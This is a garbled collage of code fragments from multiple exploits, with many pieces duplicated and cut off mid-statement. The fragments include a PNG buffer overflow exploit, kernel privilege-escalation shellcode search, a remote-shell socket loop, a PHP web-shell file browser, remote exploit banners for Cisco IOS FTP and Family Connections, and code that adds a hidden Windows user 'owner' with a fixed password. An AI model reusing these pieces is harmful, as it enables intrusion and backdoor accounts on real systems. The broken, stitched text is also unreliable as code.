printf
void print_data ( unsigned int , char * , unsigned int );
int main ( void )
{
/* message for users */
printf ( "\n*********** vpdumper.exe ***********" );
printf ( "\nCreated by Nicolas A. Economou ( neconomou@corest.com )" );
printf ( "\nCore Security Technologies, Buenos Aires, Argentina (
2010 )\n" );
/* Search and Print leaked memory */
}
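/*
 * Print a digest as text, followed by a newline, on stdout.
 *
 * digest: raw digest bytes; passed unchanged to digest_to_string().
 *
 * The text buffer is 33 bytes and zero-filled. The previous 32-byte buffer
 * left no room for a terminating NUL after 32 characters, so either the
 * conversion wrote one byte past the array or printf("%s") read past it.
 * NOTE(review): assumes digest_to_string() (defined elsewhere) emits the
 * 32 hex characters of a 16-byte MD5 digest -- confirm against its
 * definition and size the buffer from a shared constant if one exists.
 */
void print_digest(unsigned char *digest) {
    unsigned char string[33] = {0};

    digest_to_string(digest, string);
    /* Zero-fill above guarantees termination even if the helper adds none. */
    printf("%s\n", (const char *)string);
}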
/* http://www.faqs.org/rfcs/rfc2104.html */
void hmac_md5(unsigned char *text, int text_len, unsigned char *key, int
key_len, unsigned char *digest) {
if (ret == 0) {
fscanf(f, "%s\n", sname);
continue;
}
if (!strcmp(name, sname)) {
fprintf(stdout, " [+] Resolved %s to %p\n", name, (void *)addr);
fclose(f);
return addr;
}
}
char Shellcodebuilt[1000];
char *MyShellcode;
int offset=0;
int i=0;
printf("[+] .PNG File Buffer Overflow\n");
printf("[+] Coded and discovered by eidelweiss <eidelweiss@cyberservices.com>\n");
printf("[+] Generated PNG file will work for:\n\WinSoftMagic Photo Editor 2009\n\n");
if (argc!=3) {
printf("[+] Usage: %s Mode <file.png>\n",argv[0]);
printf("[+] Mode is 0 -> run calc.exe\n");
if (ret == 0) {
fscanf(f, "%s\n", sname);
continue;
}
if (!strcmp(name, sname)) {
fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
fclose(f);
return addr;
}
}
select (sock + 1, &rfds, NULL, NULL, NULL);
if (FD_ISSET (0, &rfds)) {
l = read (0, buf, sizeof (buf));
if (l <= 0) {
printf("\n - Connection closed by local user\n");
exit (EXIT_FAILURE);
}
write (sock, buf, l);
}
> if (ret == 0) {
> fscanf(f, "%s\n", sname);
> continue;
> }
> if (!strcmp(name, sname)) {
> fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
> fclose(f);
> return addr;
> }
> }
>
> if (ret == 0) {
> fscanf(f, "%s\n", sname);
> continue;
> }
> if (!strcmp(name, sname)) {
> fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
> fclose(f);
> return addr;
> }
> }
>
> if (ret == 0) {
> fscanf(f, "%s\n", sname);
> continue;
> }
> if (!strcmp(name, sname)) {
> fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
> fclose(f);
> return addr;
> }
> }
>
char *pattern;
int ret;
pattern = "\xe8\xc7\x6f\xff\xff"; /* Pattern of the code to search */
EscalatePrivileges ();
printf( "finding shellcode...\n" );
for( pos=0x80000000; pos<0xfffff000; pos=pos+0x1000 )
{
ret = ReadKernelMemory( (void*) (pos+0x0ea), (void*) buffer, 5 ); /*
Read the complete block */
#define Send(str) send(sock, (str), strlen(str), 0)
void fdsh(int sock)
{
printf("[+] Sent payload...\n");
sleep(1);
Send("echo '[+] Shell!'; PATH=$PATH:/etc:/bin:/usr/bin:/usr/ucb:/usr/new:/usr/old\n");
Send("export PATH\n");
Send("strings /vmunix | fgrep UNIX\n");
>> struct sockaddr_in addr;
>> struct sock_fprog fprog;
>> struct sock_filter filters[5];
>>
>> if (argc != 2) {
>> printf("[*] Usage: %s offset (0-63)\n", argv[0]);
>> return -1;
>> }
>>
>> val = atoi(argv[1]);
>>
echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','"',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn)));
if($winda===false)
{
$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
$group=@posix_getgrgid(@filegroup($work_dir.$fn));
printf("% 20s|% -20s",$owner['name'],$group['name']);
}
echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
printf("% 20s ",@filesize($work_dir.$fn).'B');
printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
}
> struct sockaddr_in addr;
> struct sock_fprog fprog;
> struct sock_filter filters[5];
>
> if (argc != 2) {
> printf("[*] Usage: %s offset (0-63)\n", argv[0]);
> return -1;
> }
>
> val = atoi(argv[1]);
>
struct sockaddr_in addr;
struct sock_fprog fprog;
struct sock_filter filters[5];
if (argc != 2) {
printf("[*] Usage: %s offset (0-63)\n", argv[0]);
return -1;
}
val = atoi(argv[1]);
struct sockaddr_in servaddr;
int s;
if (argc != 2)
{
printf ("\nCisco IOS FTP server remote exploit by Andy Davis
2008\n");
printf ("\nUsage: %s <target IP address>\n",argv[0]);
exit(-1);
}
low = ( ctx->total[0] << 3 );
PUT_UINT32( low, msglen, 0 );
PUT_UINT32( high, msglen, 4 );
//for(int i=0;i<8;i++) printf("length %d\n",msglen[i]);
last = ctx->total[0] & 0x3F;
padn = ( last < 56 ) ? ( 56 - last ) : ( 120 - last );
md5_update( ctx, md5_padding, padn );
>>> struct sockaddr_in addr;
>>> struct sock_fprog fprog;
>>> struct sock_filter filters[5];
>>>
>>> if (argc != 2) {
>>> printf("[*] Usage: %s offset (0-63)\n", argv[0]);
>>> return -1;
>>> }
>>>
>>> val = atoi(argv[1]);
>>>
}
/*
 * Write the tool banner and the command-line synopsis to stdout.
 *
 * bn: program name as invoked; substituted into both the "usage" and the
 *     "example" line.
 */
void usage(char *bn) {
    /* Fixed banner text: no conversions, so emit it verbatim. */
    fputs("\nFamily Connections <= 1.8.2 - Remote Shell Upload Exploit\n"
          "Author: Salvatore \"drosophila\" Fresta\n\n", stdout);

    /* Synopsis first, then a worked example, each naming the binary. */
    printf("usage: %s <server> <path> <username> <password>\n", bn);
    printf("example: %s localhost /fcms/ admin 123456\n\n", bn);
}
struct sockaddr_in servaddr;
int s;
if (argc != 2)
{
printf ("\nCisco IOS FTP server remote exploit by Andy Davis 2008\n");
printf ("\nUsage: %s <target IP address>\n",argv[0]);
exit(-1);
}
for (n=l-1;n>=0;n--) {
read_reg (f,n,&a);
read_reg (f,n+1,&b);
r = expmod (a.base,e,m);
if (r != 1) {
printf ("reverse\texp = %I64i\r\n",a.exp);
e *= a.exp;
}
}
fclose (f);
}
c='A';
y=1;
z=0x7FFE0030;
while ((ret==0) && (c<='Z'))
{
sprintf(str, "%c", c);
ret=rmemcmp(conn, z, str, y);
c++;
}
HHOOK hook;
/* Resolving the KiUserCallbackDispatcher address */
KiUserCallbackDispatcher = GetProcAddress ( GetModuleHandle (
"ntdll.dll" ) , "KiUserCallbackDispatcher" );
printf ( "%x\n" , KiUserCallbackDispatcher );
/* Changing the privileges */
VirtualProtect ( KiUserCallbackDispatcher , 1 ,
PAGE_EXECUTE_READWRITE , &oldp );
Here is a PoC that uses a Google IP address for testing purposes; the victim
proxy would exhibit the same behavior with host names:
// Lets check our target IP is handled by a NetCache:
$ printf "TRACE / HTTP/1.1\r\nHost: 74.125.65.106\r\nMax-Forwards:
0\r\nConnection: Close\r\n\r\n" | nc 74.125.65.106 80
HTTP/1.1 200 OK
Date: Mon, 17 Aug 2009 00:35:16 GMT
Content-Length: 97
Content-Type: message/http
char number[10000];
int a,b;
printf("%s", fconvert((double)0,atoi(argv[1]),&a,&b,number));
return 0;
}
# /usr/local/bin/gcc -o jaja jaja.c
# ./jaja 16
CHAR szWinDir[ _MAX_PATH ];
CHAR szCmdLine[ _MAX_PATH ];
GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );
printf( "Creating user \"owner\" with password
\"PandaOWner123\"...\n" );
wsprintf( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123
/add", szWinDir );
CHAR szWinDir[ _MAX_PATH ];
CHAR szCmdLine[ _MAX_PATH ];
GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );
printf( "Creating user \"owner\" with password \"PandaOWner123\"...\n" );
wsprintf( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123 /add", szWinDir );
system( szCmdLine );
CHAR szWinDir[ _MAX_PATH ];
CHAR szCmdLine[ _MAX_PATH ];
GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );
printf( "Creating user \"owner\" with password \"PandaOWner123\"...\n" );
wsprintf( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123
/add", szWinDir );
system( szCmdLine );
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[PHP 5.2.5 and prior : *printf() functions Integer Overflow ]
Author: Maksymilian Arciemowicz (cXIb8O3)
SecurityReason.com and SecurityReason.pl
Date:
- - Written: 01.03.2008
- - Public: 20.03.2008
CHAR szWinDir[ _MAX_PATH ];
CHAR szCmdLine[ _MAX_PATH ];
GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );
printf( "Creating user \"owner\" with password \"PandaOWner123\"...\n" );
wsprintf( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123
/add", szWinDir );
system( szCmdLine );